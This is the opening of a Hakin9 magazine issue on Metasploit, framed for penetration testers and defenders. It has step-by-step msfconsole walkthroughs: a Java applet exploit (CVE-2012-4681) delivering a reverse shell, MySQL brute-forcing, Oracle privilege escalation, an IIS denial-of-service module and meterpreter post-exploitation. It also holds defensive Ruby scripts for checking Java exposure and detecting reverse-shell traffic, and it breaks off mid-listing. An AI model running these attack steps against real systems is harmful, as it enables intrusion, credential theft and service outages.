Dear Readers,

Metasploit is used to supply its users with information concerning security vulnerabilities. It is also helpful while you conduct penetration testing. Metasploit Framework, which is the main tool used within Metasploit Project, serves to develop and execute exploit code against its target.

This issue is concerned solely with Metasploit. We decided to address the topic in response to the rampaging interest in Metasploit that we observed among our readers.

While reading this publication you will surely notice that it was divided into four sections, each addressing a different issue: Defense Pattern, Hakin9 Extra, Network Scanning and Exploring Database. Section number one describes Metasploit in the papers of Justin C. Klein Keane, Abhinav Singh and Mike Sheward. The second section includes the article by Phillip Wylie, whose publication is concerned with The Mac OS X Hackers Toolbox. The Network Scanning section comprises the articles of Michael Boman. Last but not least, the Exploring Database section includes an article by George Karpouzas.

We hope that all the articles found in our magazine are not only informative but also helpful and interesting.

Regards,

Krzysztof Samborski
Estera Godlewska
and Hakin9 Team
DEFENSE PATTERN

How to Use Metasploit for Security Defense    06
BY JUSTIN C. KLEIN KEANE

If you've ever taken any training about penetration testing, or read almost any book or online article about the trade, you've heard of Metasploit. Years ago, before penetration testing was a recognized professional field, exploiting a vulnerability was often an extremely onerous task. Identifying a vulnerability might be as easy as fingerprinting a system then searching public mailing lists, but finding exploit code was often difficult.

How to Work with Metasploit Auxiliary Modules    12
BY ABHINAV SINGH

The Metasploit framework is based on a modular architecture. This means that all the exploits, payloads, encoders etc. are present in the form of modules. The biggest advantage of a modular architecture is that it is easier to extend the functionality of the framework based on requirement. Any programmer can develop his own module and port it easily into the framework.

How to Explore the IPv6 Attack Surface with Metasploit    22
BY MIKE SHEWARD

IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.

HAKIN9 EXTRA

How to Use The Mac OS X Hackers Toolbox    30
BY PHILLIP WYLIE, CISSP, I AM

When you think of an operating system to run pen testing tools on, you probably think of Linux and more specifically BackTrack Linux. BackTrack Linux is a great option and one of the most common platforms for running pen testing tools. If you are a Mac user, then you would most likely run a virtual machine of BackTrack Linux. While this is a great option, sometimes it is nice to have your tools running on the native operating system of your computer.

NETWORK SCANNING

How to Scan with Nessus from within Metasploit    36
BY MICHAEL BOMAN

When you perform a penetration test with Metasploit you sometimes import vulnerability scanning results, for example from the Nessus Vulnerability Scanner. Usually you start the scan outside the Metasploit framework and then import the results into Metasploit. What you can do instead is manage the Nessus scan from within Metasploit and easily import the results into your process. But let's start from the beginning.

How to Use Multiplayer Metasploit with Armitage    40
BY MICHAEL BOMAN

Metasploit is a very cool tool to use in your penetration testing: add Armitage for a really good time. Penetration test engagements are more and more often a collaborative effort with teams of talented security practitioners rather than a solo effort. Armitage is a scriptable red team (that is what the offensive security teams are called) collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

EXPLORING DATABASE

How to use Sqlploit    58
BY GEORGE KARPOUZAS

Databases nowadays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information is stored in database servers that are often poorly secured. Someone with access to this information could take over a company's or an organization's infrastructure.
How to Use Metasploit for Security Defense

If you've ever taken any training about penetration testing, or read almost any book or online article about the trade, you've heard of Metasploit. Years ago, before penetration testing was a recognized professional field, exploiting a vulnerability was often an extremely onerous task.



Identifying a vulnerability might be as easy as fingerprinting a system then searching public mailing lists, but finding exploit code was often difficult. In many cases, researchers would release "proof of concept" exploit code that demonstrated a vulnerability, but did little more than launch the calc.exe program or other harmless activity. Furthermore, exploit code was often unreliable and required specific environments to build and compile. Thus, a vulnerability tester had to fingerprint systems, hunt across the internet and mailing lists for exploit code, create systems upon which to build and compile the code, then execute the code against target systems, and, with fingers crossed and bated breath, hope that the exploit worked.

The situation was frustrating, and untenable for a professional class of penetration testers who wanted reliable, easy to access exploit code to use professionally. Thus, Metasploit was born, as a framework to support standardized, tested exploit code. With Metasploit, exploit code could be packaged into "modules" in order to ensure they would work with the framework. Users of Metasploit only needed to ensure that Metasploit itself would run on a system, and exploits could be crafted for Metasploit, rather than having to rely on a testing lab full of machines of various architectures running several different operating systems in order to compile exploit code successfully. With Metasploit, testers could turn to a trusted tool and have confidence that modules included in the framework would work as advertised.



Metasploit for Defense

Metasploit has long since become the industry standard for offensive security and penetration testing. It is robust, flexible, and reliable, all of which make it a favorite among practitioners. Using Metasploit for defensive tasks may seem a little counterintuitive. Why would a network security engineer, say, be interested in an attack tool? There are many good answers to this question. In this article I'll propose a rather timely example. Recently, Oracle's Java implementation was demonstrated to have a vulnerability that allowed anyone using a web browser to be compromised, remotely, simply by viewing a web page (CVE-2012-4681). This vulnerability allowed a maliciously crafted Java applet to compromise the Java Virtual Machine (JVM) on client machines, and execute arbitrary code as the currently logged on user. This was extremely damaging, because at the time the vulnerability became public, there was no supported fix from Oracle (the flaw was a 0-day, that is, a vulnerability for which no fix exists). This meant that any attacker leveraging the exploit could take over a victim machine and there was little defenders could do. In short order a Metasploit module was released.

As expected, there was much wailing and gnashing of teeth amongst network security defense professionals. When new vulnerabilities become public the first thing organizations usually want to measure is their own level of exposure. Without specific detail it is difficult to justify the expense to remediate a problem. For instance, with the Java vulnerability, would it be worth the effort to craft intrusion detection alerts so that security staff were notified whenever a malicious Java applet was accessed, and if so, how would one determine how to write such a rule? Similarly, an organization might want to decide if they needed to turn off Java in all web browsers, and how that effort would measure against the potential risk.

Knowing the level of exposure and being able to concretely address concerns from management about a particular risk is an extremely difficult task for most defenders. Tools like Metasploit allow defenders to test exploits against their current system builds and answer these questions. Using a tool that allows defenders to actively gauge the effectiveness of countermeasures, the likelihood of exploit success, and the impact of such an exploit helps organizations craft measured, effective responses to vulnerability announcements like CVE-2012-4681.

Getting Started with Metasploit

Metasploit is a rather large and complex software program. It contains a number of tools and can be extremely intimidating for a beginner. It is not a tool that invites the casual user to develop familiarity. Rather, operators must understand Metasploit, its proper use, capabilities, and limitations, in order to get maximum value from the framework.

Getting started with Metasploit begins with downloading the latest version of the framework from Metasploit.com. There are two versions available, a free and a commercial version. Metasploit was completely free and open source until it was acquired by Rapid7, which then began offering a commercial version of the tool with extended capabilities and support. The free version remains the flagship, however, so there is no need to fear that using the free version will somehow hamper testing capabilities. The commercial version includes extra features for enterprises, so if you plan to use Metasploit on any sort of regular basis it is worth investigating.

Architecture

Metasploit is a complete framework, programmed in Ruby. Don't worry if you don't know how to program, or how to code in Ruby; the framework takes care of most of the common tasks most testers would be interested in.

Metasploit includes a number of additional tools in addition to the framework itself. You'll notice if you look in the install directory that there are complete versions of Java, Ruby, and PostgreSQL as well as Metasploit. These technologies support the framework and the various tools that come with Metasploit. Most of this should occur behind the scenes.

Installation

The Metasploit download is fairly straightforward. You can install Metasploit on Windows or Linux, or even use it in a pre-configured environment such as on the BackTrack Linux distribution. For the purposes of this article we'll explore installation of Metasploit on a Windows XP system as a sort of lowest common denominator. However, using the tools in Metasploit that require integration with separate technologies (such as Java or PostgreSQL) may be easier with a preconfigured distribution.

To get started point a browser at the Metasploit website (http://www.metasploit.com), navigate to the download section, and choose the version of Metasploit that fits your operating system (Figure 1).

Figure 1. The Metasploit download site

Once the download is complete be aware that you may get a number of warnings about Metasploit from your browser, operating system, and/or anti-virus software. Metasploit contains exploit code; by definition it is hostile, so your machine is right to identify this code as malicious. If you don't get any warnings that is likely an indication that your computer's defenses may need a little attention (Figure 2).

Figure 2. Installation warning of exploits

Open the downloaded installer and run it on your machine. You may need to add an exception to your anti-virus software to exclude the Metasploit installation directory (C:\metasploit) in order for the install to complete. Similarly, you may get warnings that your machine's firewall could interfere with the operation of Metasploit. This is mainly due to the fact that many Metasploit payloads require that targets be able to connect back to your machine. Careful manipulation of your firewall to allow these ports is a wiser approach than disabling the firewall entirely, but be aware that this could cause issues. Once you have stepped through any warnings begin the installer. Installation will require you to accept the license agreement, decide on an installation directory, choose an SSL port on which to serve Metasploit, decide on a name for the server and the server's certificate validation timespan. In most cases the default options for the installation are sufficient (Figure 3).

Up and Running

Figure 3. Metasploit installing

There are several common ways to interact with the framework, all included in the install. The first is the console, which you can find under Start -> Metasploit -> Metasploit Console. This is the command line tool that you use to interact with the framework. The other common ways to connect are Armitage (a Java based GUI tool for using Metasploit), MSFGUI, and the Web UI. I have found that the console is by far the most direct, efficient, and reliable way to interact with Metasploit. In fact, some exploits that seem to work perfectly in the console have not functioned properly when started from the Web UI (such as the Java CVE-2012-4681 exploit) (Figure 4).

Once installed, Metasploit can be utilized in a number of ways. The most direct way to interact with Metasploit is via the command line, using the msfconsole. The console can be intimidating for novice users, but it exposes all of the power and capabilities of the Metasploit framework, so it is worth exploring in order to develop proficiency.

Getting Started

Getting started with the Metasploit Console can be somewhat perplexing. There is no easy way to navigate other than by using text based commands, and some commands are extremely clunky (for instance, some commands might produce a large volume of output that will flash by the screen, but the scroll history of the Console won't let you scroll up and actually see all the output). Despite these shortcomings, the full power and flexibility of Metasploit is available from the Console, so developing proficiency is time well spent. It is worth being aware that this may take some investment, however, to avoid initial frustration and fatigue with the tool.

Before you get started with the Console it is important to make sure that you update Metasploit so that you're using the latest version of the framework with the newest exploits. The installer downloaded from the website may not include recently released exploit modules. The update program can be found under Start -> Metasploit -> Framework -> Framework Update. This will open a console window and check for the newest version of the software (Figure 5).

Figure 4. The Metasploit console

Once you're sure your version of the framework is up to date you can get started with the Console. The first command that you should learn in the Console is the 'help' command. This will list out all of the commands that you can use in the console. There are quite a number of commands. To get more information about a command you can type 'help' followed by the command you're interested in (such as 'help banner') (Figure 6).

To find exploits you'll need to utilize the 'search' command. To list all the exploit modules in Metasploit you can simply type 'show', but as mentioned before, this is of little use since the Console will display far too many modules for the interface to actually display. Instead, try using the 'search' command and searching for Java vulnerabilities by typing 'search java'. You'll notice that even just searching for this one phrase lists quite a number of results.

When searching for Java modules one also quickly notices that there are different types of modules listed: auxiliary, exploit, and payload. We'll be interested in the exploit modules in order to craft a malicious Java applet, and the payload modules to craft our malware payload that will execute whenever a vulnerable machine accesses the applet. To search for exploits specific to the vulnerability we want to test, type 'search cve:2012-4681'. Alternatively you can use the Metasploit website to search for exploits and find useful descriptions, including usage documentation, at http://www.metasploit.com/modules (Figure 7).
Crafting the Exploit

To begin building our exploit we'll have to tell Metasploit which module to use. To do this simply type 'use' followed by the name of the exploit (remember, you can type 'help use' to get an example of how to execute the 'use' command). In this case we'll type in 'use exploit/multi/browser/java_jre17_exec' in order to start using the exploit. You'll notice that the Console prompt changes so that you know which exploit you're using (Figure 8).

Now that we're using the desired exploit we have to provide instructions for Metasploit to craft our malicious payload. So far Metasploit knows we want to use the Java 1.7 vulnerability to craft an exploit, but once Metasploit takes advantage of the vulnerability it needs to understand what instructions we want to execute on the victim computer. For this example, we will create a payload that spawns a reverse shell. A reverse shell is a command prompt that we can access locally, but which actually executes commands on the target system. We can choose from a number of payloads, which we can explore using the 'show payloads' command.

To select the payload type in 'set PAYLOAD java/shell/reverse_tcp' and hit enter. This will set up a payload in the applet that will execute and "shovel" a shell over TCP back to our machine. In order for the payload to work we need to tell Metasploit the IP address of the machine to connect back to. To do this type in 'set LHOST [ip_address]' where [ip_address] is the IP of your machine. Once this information is entered we're ready to begin. Simply type in 'exploit' to start the exploit (which spawns a web server listening at a specific URL, detailed in the Console output, that will deliver our payload when accessed) (Figure 9).

Figure 6. Metasploit Console help command

Figure 7. Using the Metasploit Console search command

Figure 8. Metasploit Console prompt changes to show the

Testing the Exploit

Setting up a test machine may be a little tricky. You'll have to ensure that Java is installed on the machine, but you need an older, vulnerable version. Older versions of Java are available from Oracle, for testing purposes. You can find older versions at http://www.oracle.com/technetwork/java/archive-139210.html or generally by looking for Java Downloads and then following the link to Previous Releases. Using Java 1.7.0_6 should be sufficient. To determine the version of Java you have installed type 'java -version' at the command line.
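The same 'java -version' check, run across every workstation rather than one test machine, is how a defender turns the article's question about "level of exposure" into a number. The following Ruby script is an added example (it is not from the article and not part of Metasploit): it parses captured 'java -version' output for each host and flags Java 1.7 builds at or below the 1.7.0_6 version the article uses as its known-vulnerable test version. The host names, the captured outputs and the choice of 1.7.0_6 as the cut-off are assumptions made for the example.

```ruby
# Added example (not from the article): flag hosts whose installed Java is
# a 1.7 build at or below 1.7.0_6, the version the article uses as its
# vulnerable test build, using captured `java -version` output per host.
# The inventory below is constructed sample data, not real hosts.

# `java -version` prints the version on its first line in the form
#   java version "1.7.0_06"
# Update numbers may be zero-padded; 1.7.0_6 and 1.7.0_06 are the same build.
JAVA_VERSION_RE = /java version "(\d+)\.(\d+)\.(\d+)(?:_(\d+))?"/

# Parse `java -version` output into a comparable tuple
# [major, minor, patch, update]; returns nil when no version line is found.
def parse_java_version(output)
  m = JAVA_VERSION_RE.match(output)
  return nil unless m
  [m[1].to_i, m[2].to_i, m[3].to_i, m[4].to_i]
end

# Cut-off taken from the article: Java 1.7.0_6 is a known-vulnerable build
# for the CVE-2012-4681 test. Anything on the 1.7 line at or below it is
# treated as exposed. This is an assumption for the example; it says
# nothing about which later updates carry the fix.
VULNERABLE_THROUGH = [1, 7, 0, 6].freeze

def exposed?(version)
  return false if version.nil?
  version[0..1] == VULNERABLE_THROUGH[0..1] && (version <=> VULNERABLE_THROUGH) <= 0
end

# inventory: hostname => captured `java -version` output (stderr included).
# Returns the sorted hostnames to prioritise (update Java, or keep the
# browser plugin disabled until it is updated).
def exposed_hosts(inventory)
  inventory.select { |_host, out| exposed?(parse_java_version(out)) }.keys.sort
end

# Constructed sample inventory for demonstration.
SAMPLE_INVENTORY = {
  "ws-01" => "java version \"1.7.0_06\"\nJava(TM) SE Runtime Environment (build 1.7.0_06-b24)",
  "ws-02" => "java version \"1.7.0_07\"\nJava(TM) SE Runtime Environment (build 1.7.0_07-b10)",
  "ws-03" => "java version \"1.6.0_33\"\nJava(TM) SE Runtime Environment (build 1.6.0_33-b03)",
  "ws-04" => "'java' is not recognized as an internal or external command",
}.freeze

if __FILE__ == $PROGRAM_NAME
  puts "Hosts on a Java 1.7 build at or below 1.7.0_6:"
  exposed_hosts(SAMPLE_INVENTORY).each { |h| puts "  #{h}" }
end
```

Hosts with no Java at all (ws-04 in the sample) are not exposed and are left out of the result, which keeps the count honest when arguing for remediation budget.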

In your test machine, pull up a web browser and type in the address of the Metasploit server. This is a somewhat contrived way to access the malicious applet. In the wild, applets such as this are generally included in hidden iframe tags that are inserted into otherwise innocuous web pages. The exploit can be further hidden by obfuscating the reference using JavaScript and functions that encode and decode data, so that anyone observing the HTML source code of an infected web page would see nothing but gibberish code that web browsers can easily decode and execute but which is more difficult for human eyes to parse (Figure 10).

Figure 9. Metasploit exploit started

Figure 10. Vulnerable machine being exploited via malicious Java applet

Calling the URL from your test machine should only result in a blank screen (or in this case a warning that the Java plugin is out of date, which, kudos to Oracle, should nag most users into updating). The only indication that the exploit has been successful will appear in the Metasploit Console (Figure 11).

Once you see the indication that the stage has been sent you can check to see if a session is available. To do this, in the Console, hit enter to get back to a prompt. Next, type in 'sessions' to see the active sessions that are available. You should see an indication that the reverse shell is up and listening. Note the 'id' of the session, as you need this information to connect to the session (Figure 12).

Figure 11. Metasploit console shows the target has been exploited

Figure 12. Metasploit shows the actively exploited machines as sessions

Once a session is established we can interact with the session by typing in 'sessions -i [id]' where [id] is the id number noted previously. There are a number of session commands that you can explore using the 'help sessions' command. As soon as you enter interactive mode you'll notice the command prompt will change to the familiar MS-DOS prompt and you can type commands as though you were logged into the target computer (Figure 13).

Production Use

Establishing a proof of concept is useful in confirming that your Metasploit exploit will actually work. Putting it into practice in the wild is the next step. You'll want to have Metasploit installed on a machine that is accessible in your environment, and then start up the exploit so it is serving from the server. Next, placing a reference to the Metasploit applet in an iFrame on an intranet site or other page that you know users in your environment will access will allow you to test infection rates. Checking the console periodically will allow you to see the IP addresses of users who are vulnerable to the exploit.

A better plan is to simply observe what configurations fall victim to the Metasploit exploit and what configurations do not, then adjust your production systems to protect them. Many antivirus products will detect the Metasploit payload and stop it, which is reassuring in that you can be confident that your AV solution will detect Metasploit attacks. A better solution is a configuration that prevents Java from even attempting to execute the malicious applet. For instance, whitelisting the sites on which Java is allowed to execute can greatly limit the scope.



Conclusions

The ability to test exploits against systems in your environment is a tremendous advantage. Using Metasploit you can easily, and extremely accurately, gauge your exposure to compromise. The Java 1.7 vulnerability (CVE-2012-4681) is just one example. Metasploit includes hundreds of modules, including some that will test misconfiguration in addition to vulnerabilities. There are modules that will perform brute force attacks to do things like test the strength of passwords on your SQL servers, in addition to target enumeration modules that will perform ping sweeps, find hosts on your network vulnerable to idle scanning, and more.

Hopefully this brief tutorial has convinced you that Metasploit has value to system defenders as well as penetration testers. Simulating an attack is a great way to expose vulnerabilities in your networks, but it's also a good way to test defensive countermeasures. Using a tool like Metasploit, defenders can test the value of defenses and deploy them with confidence. It will also allow defenders to speak about the likelihood of specific types of attacks penetrating defenses and compromising systems. Additionally, using Metasploit, defenders can "footprint" attacks and identify patterns that result from various classes of attacks, and tune not only their prevention countermeasures, but also their detection measures (could your network spot a reverse shell spawning from one of the internal workstations?). For all of these reasons Metasploit should definitely be a part of any internal security team's toolkit.
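The closing question, whether your network could spot a reverse shell spawning from an internal workstation, has a concrete shape once you recall how the java/shell/reverse_tcp payload works: the victim opens an outbound connection to the listener, so the signal is a workstation initiating a connection to a port workstations never normally use. The Ruby script below is an added example (not from the article, not part of Metasploit) of that detection pass run over firewall or flow log lines. The log format, the workstation subnet, the list of expected destination ports and the addresses are all constructed for the example; port 4444 appears in the sample only because it is Metasploit's default LPORT, which the article itself does not state.

```ruby
require "ipaddr"

# Added example (not from the article): detect workstations initiating
# outbound TCP connections to unexpected ports, the network-level trace a
# reverse_tcp payload leaves when it calls back to the listener.
# Log lines, subnet and addresses below are constructed sample data.

# Subnet that holds end-user workstations (assumed for the example).
WORKSTATION_NET = IPAddr.new("192.168.56.0/24")

# Destination ports workstations are expected to initiate connections to
# (web, DNS, SMB, Kerberos, LDAP, RDP). Anything else is worth a look.
EXPECTED_DST_PORTS = [53, 80, 443, 445, 88, 389, 636, 3389].freeze

# One space-separated flow record in the constructed format:
#   <time> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto>
LINE_RE = /\A(\S+)\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)\s+(\w+)\z/

# Parse one line into a hash; nil for lines that do not match the format.
def parse_flow(line)
  m = LINE_RE.match(line.strip)
  return nil unless m
  { time: m[1], src: m[2], sport: m[3].to_i, dst: m[4], dport: m[5].to_i, proto: m[6].downcase }
end

# A flow is suspicious when a workstation initiates TCP to a destination
# port outside the expected set.
def suspicious?(flow)
  flow[:proto] == "tcp" &&
    WORKSTATION_NET.include?(IPAddr.new(flow[:src])) &&
    !EXPECTED_DST_PORTS.include?(flow[:dport])
end

# Run the check over raw log lines. Returns alerts grouped by listener
# ("dst:dport") with the sorted, de-duplicated list of workstations that
# connected to it. Read against the article's intranet test, the size of
# each list is the "infection rate" the author checks the console for.
def reverse_shell_alerts(lines)
  alerts = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    flow = parse_flow(line)
    next unless flow && suspicious?(flow)
    alerts["#{flow[:dst]}:#{flow[:dport]}"] << flow[:src]
  end
  alerts.transform_values { |srcs| srcs.uniq.sort }
end

# Constructed sample log. Port 4444 is Metasploit's default LPORT (an
# assumption for the sample; in practice it is whatever the tester sets).
SAMPLE_LOG = <<~LOG
  2012-09-01T10:00:01 192.168.56.101:49152 -> 10.0.0.5:443 TCP
  2012-09-01T10:00:02 192.168.56.101:49153 -> 192.168.56.1:4444 TCP
  2012-09-01T10:00:03 192.168.56.102:49201 -> 192.168.56.1:4444 TCP
  2012-09-01T10:00:04 192.168.56.103:49300 -> 10.0.0.9:445 TCP
  2012-09-01T10:00:05 10.0.0.5:55555 -> 192.168.56.101:8080 TCP
  2012-09-01T10:00:06 192.168.56.104:49400 -> 10.0.0.53:53 UDP
  garbage line that should be skipped
LOG

if __FILE__ == $PROGRAM_NAME
  reverse_shell_alerts(SAMPLE_LOG.lines).each do |listener, hosts|
    puts "#{listener} received connections from #{hosts.join(', ')}"
  end
end
```

The allow-list approach is deliberately simple: it will also surface legitimate software using odd ports, which is the tuning work the article refers to when it talks about adjusting detection measures after observing what the test traffic looks like.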
Figure 13. Using Metasploit to type commands on the exploited target

Justin C. Klein Keane is an information security specialist working at the University of Pennsylvania. Mr. Klein Keane holds a Masters degree in Computers and Information Technology and is an accomplished security researcher. Mr. Klein Keane prefers to work with open source technologies and has made numerous contributions to the open source community in the form of vulnerability reports, most notably for the open source content management system Drupal. Mr. Klein Keane performs penetration testing and proof of concept exploitation frequently and regularly uses Metasploit to accurately model organizational risk in the face of emerging threats. Mr. Klein Keane writes irregularly for his website www.MadIrish.net.
How to Work with Metasploit Auxiliary Modules

The Metasploit framework is based on a modular architecture. This means that all the exploits, payloads, encoders etc. are present in the form of modules. The biggest advantage of a modular architecture is that it is easier to extend the functionality of the framework based on requirement.

Any programmer can develop his own module and port it easily into the framework. Even though modules are not talked about very much while working with Metasploit, they form the crux of the framework, so it is essential to have a deep understanding of them.

In this tutorial we will particularly focus on the /framework3/modules directory, which contains a complete list of useful modules that can ease our task of penetration testing. Later in the chapter we will also analyse some of the existing modules and finally conclude the discussion by learning how to develop our own modules for Metasploit. So let us start our experiments with modules.

Working with Scanner Modules

Let us begin our experimentation with scanner modules. We will start with the scanning modules which ship with the framework. Even though nmap is a powerful scanning tool, there can still be situations where we have to perform a specific type of scan, like scanning for the presence of a MySQL database.

Metasploit provides us a complete list of such useful scanners. Let us move ahead and practically implement some of them. To find the list of available scanners we can browse to /framework3/modules/auxiliary/scanner.

You can find a collection of more than 35 useful scan modules which can be used under various penetration testing scenarios. Let us start with a basic HTTP scanner. You will see that there are lots of different HTTP scan options available. We will discuss a few of them here.

Consider the dir_scanner script. This will scan a single host or a complete network range to look for interesting directory listings that can be further explored to gather information.

To start using an auxiliary module, we will have to perform the following steps in our msfconsole:

msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > show options

Module options:

The show options command will list all the available optional parameters that you can pass along with the scanner module. The most important one is the RHOSTS parameter, which will help us in targeting either a single host or a range of hosts.

Let us discuss a specific scanner module involving some extra inputs. The mysql_login scanner module is a brute force module which scans for the availability of a MySQL server on the target and tries to log in to the database by brute forcing it.

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module Options (auxiliary/scanner/mysql/mysql_login): see Listing 1.

As you can see there are lots of different parameters that we can pass to this module. The better we leverage the powers of a module, the greater are our chances of successful penetration testing. We can provide a complete list of usernames and passwords which the module can use and try on the target machine. Let us provide this information to the module.

msf auxiliary(mysql_login) > set USER_FILE /users.txt
USER_FILE => /users.txt
msf auxiliary(mysql_login) > set PASS_FILE /pass.txt
PASS_FILE => /pass.txt

Now we are ready to brute force. The last step will be selecting the target and providing the run command to execute the module (Listing 2).

The output shows that the module starts the process by first looking for the presence of a MySQL server on the target. Once it has found one, it starts trying the combinations of usernames and passwords provided to it through the external text files. This is also one of the most widely used modular operations of Metasploit in the current scenario. A lot of automated brute force modules have been developed to break weak passwords.

Working With Admin Auxiliary modules 

Moving ahead with our module experiment, we will 
learn about some admin modules which can be re- 
ally handy during penetration testing. The admin 
modules can serve different purposes like it can 
look for an admin panel, or it can try for admin login 
etc. It depends upon the functionality of the mod- 
ule. Here we will look at a simple admin auxiliary 
module called mysql enum module. 

The mysqi enum module is a special utility mod- 
ule for mysql database servers. This module pro- 
vides simple enumeration of mysql databse serv- 
er provided proper credentials are provided to 
connect remotely. Let us understand it in detail 
by using the module. We will start with launching 
the msfconsole and providing the path for auxil- 
iary module. 

msf > use auxiliary/admin/mysql/mysql_enum 
msf auxiliary (mysql_enum) > show options 

Module Options (auxiliary/admin/mysql/mysql _ 
enum)i 



Listing 1. Module options

Name              Current Setting  Required  Description
BLANK_PASSWORDS   true             yes       Try blank pas...
BRUTEFORCE_SPEED  5                yes       How fast to...
PASSWORD                           no        A specific password
PASS_FILE                          no        File containing...
RHOSTS                             yes       The target address.
RPORT             3306             yes       The target port...
STOP_ON_SUCCESS   false            yes       Stop guessing...
THREADS           1                yes       The number of...
USERNAME                           no        A specific user...
USERPASS_FILE                      no        File containing...
USER_FILE                          no        File containing...
VERBOSE           true             yes       Whether to print...

Listing 2. Running a command to execute the module

msf auxiliary(mysql_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101

msf auxiliary(mysql_login) > run

[*] 192.168.56.101:3306 - Found remote MySQL version 5.0.51a
[*] 192.168.56.101:3306 Trying username 'administrator' with password: ''
Name      Current Setting  Required  Description
PASSWORD                   no        The password for the...
RHOST                      yes       The target address
RPORT     3306             yes       The target port
USERNAME                   no        The username to...



As you can see, the module accepts a password, a username and RHOST as parameters. This lets the module first check for the existence of a MySQL database and then apply the credentials to attempt a remote login. There are several similar modules available for other services like MSSQL, Apache etc. The working process is similar for most of the modules. Remember to use the show options command in order to make sure that you are passing the required parameters to the module.

SQL Injection and DOS attack modules 

Metasploit is friendly for both penetration testers as well as hackers. The reason for this is that a penetration tester has to think from a hacker's perspective in order to secure the network. The SQL injection and DOS modules help penetration testers attack their own services in order to figure out if they are susceptible to such attacks. So let's discuss some of these modules in detail. The SQL injection modules use a known vulnerability in the database type to exploit it and provide unauthorized access. The modules can be found in modules/auxiliary/sqli/oracle.

Let us analyse an Oracle vulnerability called the Oracle dbms_metadata get_xml vulnerability. This vulnerability will escalate the privilege from DB user to DBA (Database Administrator). We will be using the dbms_metadata_get_xml module.
Listing 3. Module options

msf auxiliary(dbms_metadata_get_xml) > show options

Module Options (auxiliary/sqli/oracle/dbms_metadata_get_xml):

Name    Current Setting     Required  Description
DBPASS  TIGER               yes       The password to...
DBUSER  SCOTT               yes       The username to...
RHOST                       yes       The Oracle host...
RPORT   1521                yes       The TNS port...
SID     ORCL                yes       The sid to authenticate...
SQL     GRANT DBA to SCOTT  no        SQL to execute...



The module requests parameters similar to the ones we have seen so far. It first tries to log in to the database using the default credentials, i.e. "SCOTT" and "TIGER" as the default username and password respectively. This gives a DB_User level login. Once the module gains a login as a database user, it then executes the exploit to escalate the privilege to database administrator. Let us execute the module as a test run on our target.

msf auxiliary(dbms_metadata_get_xml) > set RHOST 192.168.56.1
msf auxiliary(dbms_metadata_get_xml) > set SQL YES
msf auxiliary(dbms_metadata_get_xml) > run

On successful execution of the module, the user privilege will be escalated from db_user to db_ADMINISTRATOR.

The next module we will cover is related to Denial Of Service (DOS) attacks. We will analyze a simple IIS 6.0 vulnerability which allows the attacker to crash the server by sending a POST request containing more than 40000 request parameters. We will analyze the vulnerability shortly. This module has been tested on an unpatched Windows 2003 server running IIS 6.0. The module we will be using is ms10_065_ii6_asp_dos.

msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos
msf auxiliary(ms10_065_ii6_asp_dos) > show options

Module Options (auxiliary/dos/windows/http/ms10_065_ii6_asp_dos):

Name   Current Setting  Required  Description
RHOST                   yes       The target address
RPORT  80               yes       The target port
URI    /page.asp        yes       URI to request
VHOST                   no        The virtual host name to...

msf auxiliary(ms10_065_ii6_asp_dos) > set RHOST 192.168.56.1
RHOST => 192.168.56.1

msf auxiliary(ms10_065_ii6_asp_dos) > run
[*] Attacking http://192.168.56.1:80/page.asp

Once the module is executed using the run command, it will start attacking the target IIS server by sending HTTP requests on port 80 with the URI page.asp. Successful execution of the module will lead to complete denial of service of the IIS server.

Listing 4. The usage of the getsystem command



Post Exploitation Modules

We also have a separate dedicated list of modules that can enhance our post-exploitation penetration testing experience. Since they are post exploitation modules, we will need an active session with our target. Here we are using an unpatched Windows 7 machine as our target with an active meterpreter session.

You can locate the post modules in modules/post/windows/gather. Let us start with a simple enum_logged_on_users module. This post module will list the currently logged in users on the Windows machine.

We will execute the module through our active meterpreter session. Also keep in mind to escalate the privilege using the getsystem command in order to avoid any errors during the execution of the module (Listing 4).

meterpreter > getsystem
...got system (via technique 4).

meterpreter > run post/windows/gather/enum_logged_on_users
[*] Running against session 1

Current Logged Users

SID                                      User
S-1-5-21-2350281388-457184790-407941598  DARKLORD-PC\DARKLORD

Recently Logged Users

SID             Profile Path
S-1-5-18        %systemroot%\system32\config\systemprofile
S-1-5-19        C:\Windows\ServiceProfiles\LocalService
S-1-5-20        C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-23502  C:\Users\DARKLORD
S-1-5-21-235    C:\Users\Winuser

Successful execution of the module shows us two tables. The first table reflects the currently logged on user and the second table reflects the recently logged on users. Follow the correct path while executing the modules. We have used the run command to execute the modules, as they are all in the form of Ruby scripts so meterpreter can easily identify them.

Let us take one more example. There is an interesting post module that captures a screenshot of the target desktop. This module can be useful when we have to know whether there is any active user or not. The module we will use is screen_spy.rb.

meterpreter > run post/windows/gather/screen_spy
[*] Migrating to explorer.exe pid: 1104
[*] Migration successful
[*] Capturing 60 screenshots with a delay of 5 seconds

You might have noticed how easy and useful post modules can be. In the coming future, the developers of Metasploit will be focusing more on post modules rather than meterpreter as it greatly enhances the functionality of penetration



Listing 5. Pulling out the main scan module from the metasploit library

def initialize
  super(
    'Name'        => 'TCP Port Scanner',
    'Version'     => '$Revision$',
    'Description' => 'Enumerate open TCP services',
    'Author'      => ['darklord'],
    'License'     => MSF_LICENSE
  )

Listing 6. Module's details

  register_options(
    [
      OptString.new('PORTS', [true, "Ports to scan (e.g. 25,80,110-900)", "1-10000"]),
      OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]),
      OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10]),
    ], self.class)

  deregister_options('RPORT')
end
Listing 7. Storing of the boolean value in res

      if res
        write_check = send_cmd(['MKD', dir], true)

        # a 2xx reply to MKD means the anonymous user may write
        if (write_check and write_check =~ /^2/)
